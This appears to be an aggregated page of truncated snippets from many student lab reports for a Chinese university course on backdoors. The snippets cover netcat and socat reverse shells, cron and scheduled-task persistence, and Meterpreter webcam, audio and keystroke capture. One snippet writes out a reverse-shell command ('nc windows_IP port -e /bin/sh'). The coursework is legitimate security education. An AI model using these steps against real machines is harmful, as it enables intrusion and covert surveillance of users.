2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践 实验内容 使用netcat获取主机操作Shell,cron启动: 使用socat获取主机操作Shell, 任务计划启动: 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell: 使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权: 可选加分内容:使用MSF生成shellcode,注入到…

20155326刘美岑 <网络对抗>Exp2 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 (5)可选加分内容:使用MSF生成shellcode,注入到实践…

20155320<网络对抗>Exp2 后门原理与实践 [实验内容] (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 (5)可选加分内容:使用MSF生成shellcode,…

20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Windows下,先使用ipconfig指令查看本机IP: 使用ncat.exe程序监听本机的5324端口: 在Kali环境下,使用nc指令的-e选项反向连接Windows主机的5324端口: Windows下成功获得了一个Kali的shell,运行ls指令如下: Linux获得Windows Shell 过程与之…

20155208徐子涵<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 答:当我们在非官方网站上下载软件时,后门极有可能会进入我们的系统,或者我们的电脑插入陌生可疑的U盘时,也有可能会让某些后门乘虚而入. (2)例举你知道的后门如何启动起来(win及linux)的方式? 答:可能会通过反弹和windows计划任务(这个是看老师的实验指导后知道的). (3)Meterpreter有哪些给你印像深刻的功能? 答: 我觉得让我印象最深刻的是操…

20145236<网络对抗>Exp2 后门原理与实践 目录: 一.基础问题回答 二.常用后门工具实践 2.1 Windows获得Linux Shell 2.2 Linux获得Windows Shell 2.3 使用nc传输数据 2.4 使用ncat实现文件传输 三.实验内容 3.1 使用netcat获取主机操作Shell,cron启动 3.2 使用socat获取主机操作Shell, 任务计划启动 3.3 使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行…

20155202 张旭<网络对抗>Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 捆绑在软件中 注入在可执行文件里 注入在office文件的宏里面 例举你知道的后门如何启动起来(win及linux)的方式? 更改名字伪装成其他程序 Linux可以使用cron启动 Windows下通过任务计划来启动后门程序 Meterpreter有哪些给你映像深刻的功能? 获取摄像头权限进行拍照 获取麦克风权限进行录音 提升用户权限!!!!! 如何发现自己有系统有没有被…

20155218<网络对抗>Exp2 后门原理与实践 常用后门工具实践 1.Windows获得Linux Shell: 在Windows下,先使用ipconfig指令查看本机IP,使用ncat.exe程序监听本机的5218端口,在Kali环境下,使用nc指令的-e选项反向连接Windows主机的5218端口,Windows下成功获得了一个Kali的shell,运行ls指令如下: MAC获得linux Shell: 同Windows环境下基本相似 遇到的问题:在防火墙关闭的情况下无法ping通,…

20155227<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 在非官方网站下载软件时,后门很可能被捆绑在软件中. 攻击者利用欺骗的手段,通过发送电子邮件或者文件,并诱使主机的操作员打开或运行藏有木马程序的邮件或文件,这些木马程序就会在主机上创建一个后门. (2)例举你知道的后门如何启动起来(win及linux)的方式? Linux下可以通过cron来启动 Windows下在控制面板的管理工具中可以设置任务计划启动,或者通过修改注册表…

20155232<网络对抗>Exp2 后门原理与实践 问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? 通过网页上弹出来的软件自动安装 2.例举你知道的后门如何启动起来(win及linux)的方式? 更改注册表,自启动方式. 跟正常的软件捆绑起来 3.Meterpreter有哪些给你映像深刻的功能? 击键记录还有获取摄像头权限进行拍照.击键记录可以在这段时间内截获到你写的内容或者数据,如果是机密性的东西,就很麻烦了..获取摄像头权限有种被监视的感觉.... 4.如何发现自己有系统…

20155332<网络对抗>Exp2 后门原理与实践 实验内容 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, 任务计划启动 (0.5分) (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 (2分) (5)可…

20155310<网络对抗>Exp2 后门原理与实践 基础问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? 在网上下载软件的时候,后门很有可能被捆绑在下载的软件当中: 浏览网页的时候,点的一些小广告可能会被植入后门. 2.例举你知道的后门如何启动起来(win及linux)的方式? Windows下在控制面板的管理工具中可以设置任务计划启动,或者通过修改注册表来达到自启的目的: 对后门程序进行伪装,例如重命名成某个游戏的开始程序之类的,诱骗用户点击启动: Linux下可以通过cro…

20155317王新玮<网络对抗>Exp2 后门原理与实践 一.实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 (5)可选加分内容:使用MSF生成shellcode,注入到实…

20155333 <网络对抗>Exp2 后门原理与实践 1.例举你能想到的一个后门进入到你系统中的可能方式? 下载的软件中捆绑有后门: 浏览的网页或其上的小广告: 有些网页会自动安装软件. 2.例举你知道的后门如何启动起来(win及linux)的方式? 在Windows下在控制面板的管理工具中可以设置任务计划启动: 修改注册表,自启动: 对后门程序进行伪装,诱骗用户点击启动: 3.Meterpreter有哪些给你映像深刻的功能? 获取目标主机音频.摄像头.击键记录等内容. 4.如何发现自己有系…

20155337 <网络对抗> Exp2 后门原理与实践 一.基础问题回答 - 例举你能想到的一个后门进入到你系统中的可能方式? 在Unix里,login程序通常用来对telnet来的用户进行口令验证. 入侵者获取login.c的原代码并修改,使它在比较输入口令与存储口令时先检查后门口令. 如果用户敲入后门口令,它将忽视管理员设置的口令让你长驱直入. 这将允许入侵者进入任何帐号,甚至是root.由于后门口令是在用户真实登录并被日志记录到utmp和wtmp前产生一个访问的, 所以入侵者可以登录获…

20145215<网络对抗>Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 在网上下载软件的时候,后门很有可能被捆绑在下载的软件当中: 浏览网页的时候,点的一些小广告可能会被植入后门. 例举你知道的后门如何启动起来(win及linux)的方式? Windows下在控制面板的管理工具中可以设置任务计划启动,或者通过修改注册表来达到自启的目的: 对后门程序进行伪装,例如重命名成某个游戏的开始程序之类的,诱骗用户点击启动: Linux下可以通过cron来启动…

20145220韩旭飞<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Windows下,先使用ipconfig指令查看本机IP: 使用ncat.exe程序监听本机的5220端口: 在Kali环境下,使用nc指令的-e选项反向连接Windows主机的5220端口: Windows下成功获得了一个Kali的shell,运行ls指令如下: Linux获得Windows Shell 过程与之前的类似,在Kali环境下用ifconfig查看IP: 使用…

20145317彭垚<网络对抗>Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 在网上下载软件的时候,后门很有可能被捆绑在下载的软件当中: 例举你知道的后门如何启动起来(win及linux)的方式? Windows下在控制面板的管理工具中可以设置任务计划启动,或者通过修改注册表来达到自启的目的: 对后门程序进行伪装,例如重命名成某个游戏的开始程序之类的,诱骗用户点击启动: Linux下可以通过cron来启动. Meterpreter有哪些给你映像深刻的…

20145331魏澍琛<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 上网时候弹出一个广告说你中奖了,或者你可以贷款10万元之类的,你一激动一点进去后门就进入你的系统了. (2)例举你知道的后门如何启动起来(win及linux)的方式? 比如下载一个游戏,下下来你会发现除了游戏快捷方式还有什么游戏大厅.游戏加速,或者什么最新的网页游戏(传奇狂暴版),你一好奇一点进去后门就启动了. (3)Meterpreter有哪些给你映像深刻的功能?…

20155338<网络对抗>Exp2 后门原理与实践 一. 基础问题 (1)例举你能想到的一个后门进入到你系统中的可能方式? 答:游览网站中附带的广告或弹出的不正规软件. (2)例举你知道的后门如何启动起来(win及linux)的方式? 答:1．操作系统自带服务: 2．网络协议捆绑: 3．软件编写者制作: 4．漏洞攻击后放置: (3)Meterpreter有哪些给你映像深刻的功能 答:录屏,提升权限和录音. (4)如何发现自己有系统有没有被安装后门 答:用网络命令来看计算机所连接的设备有没有陌…

20145301<网络对抗>Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 系统或者某些软件自身留下的后门. 钓鱼网站等非正规网站上捆绑下载 例举你知道的后门如何启动起来(win及linux)的方式? 操作系统自带服务: 网络协议捆绑: 被控端被设置了cron启动,定时循环启动: 被控端被设置了任务计划启动,在被控端达到某个条件时自动运行: 社会工程学等相关方式,比如诱导你自己打开后门软件: Meterpreter有哪些给你映像深刻的功能? 通过指令可…

20145303刘俊谦<网络对抗>Exp2 后门原理与实践 基础问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? •在网页上浏览不安全的网站或者下载不安全的软件 •通过发送邮件的方式传输到电脑上 •通过u盘硬盘等 2.例举你知道的后门如何启动起来(win及linux)的方式? Windows下在控制面板的管理工具中可以设置任务计划启动,或者通过修改注册表来达到自启的目的:Linux下可以通过cron来启动 3.Meterpreter有哪些给你映像深刻的功能? 击键纪录应该是黑客能…

20145307陈俊达<网络对抗>Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 非正规网站下载的软件 脚本 或者游戏中附加的第三方插件 例举你知道的后门如何启动起来(win及linux)的方式? 自启动型木马,windows计划任务 Meterpreter有哪些给你映像深刻的功能? 自动制作后门这点很厉害,黑客只需要输入命令即可,键盘录入器这是最致命的,你所有的密码都会被发现并记录 如何发现自己有系统有没有被安装后门? 及时安装可靠的防火墙 常用后门…

20145333<网络对抗>Exp2 后门原理与实践 1.基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 通过邮件发送,邮箱里经常受到一些陌生人发来的链接. 误入了一些不安全的网站. 网上下载软件时被一起打包下载了. (2)例举你知道的后门如何启动起来(win及linux)的方式? Windows下在控制面板的管理工具中可以设置任务计划启动,或者通过修改注册表来达到自启的目的: Linux下可以通过cron来启动. (3)Meterpreter有哪些给你映像深刻的功能?…

20145209刘一阳<网络对抗>Exp2 后门原理与实践 基础问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? •在网上下载软件的时候,后门很有可能被捆绑在下载的软件当中: •浏览网页的时候,点的一些小广告可能会被植入后门. 2.例举你知道的后门如何启动起来(win及linux)的方式? •Windows下在控制面板的管理工具中可以设置任务计划启动,或者通过修改注册表来达到自启的目的: •对后门程序进行伪装,例如重命名成某个游戏的开始程序之类的,诱骗用户点击启动: •Linux…

20155330 <网络对抗> 实验二 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 在网站上下载非官方软件,所下载的软件中携带伪装过的后门程序. 例举你知道的后门如何启动起来(win及linux)的方式? 将后门程序伪装为被启动项目. Meterpreter有哪些给你映像深刻的功能? 记录音频.获取入侵主机权限. 如何发现自己有系统有没有被安装后门? 使用杀毒软件进行查杀. 实验内容 使用netcat获取主机操作Shell,cron启动 使用socat获取主…

实验过程 1.Win获得Linux Shell windows:使用ipconfig指令查看本机ip: windows:使用ncat命令打开监听: Linux反弹连接win: 输入 nc windows_IP 端口号 -e /bin/sh连接win windows运行指令,如ls,查看,截图见上. 2.Linux获得Win Shell linux:使用ifconfig指令查看ip: linux使用命令nc -l -p 端口号监听 windows反弹连接linux: linux下查看windows…

实验内容 (1)使用netcat获取主机操作Shell,cron启动,使用socat获取主机操作Shell, 任务计划启动. (2)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell,获取目标主机音频.摄像头.击键记录等内容,并尝试提权,注入到实践1中的pwn1中,获取反弹连接Shell. 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 比如通过qq文件传输,可以把后门顺便传入对方电脑 (2)例举你知道的后门如何启动…

实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 在非正规的网址下载的软件,里面经常有很多捆绑的不明程序,有可能就会被…… 一些奇奇怪怪…

常见问题快速链接 Handler failed to bind to xxx.xxx.xx.xxx:xxxx 使用Webcam_snap命令提示1411错误,无法正常拍照 常用后门工具实践 Windows获得Linux Shell Windows:使用ipconfig指令查看本机IP: 使用ncat.exe程序监听本机的4312端口: Kali:使用nc指令的-e选项反向连接Windows主机的4312端口: Windows下成功运行Kali的shell,运行ls指令如下: Linux获得Win…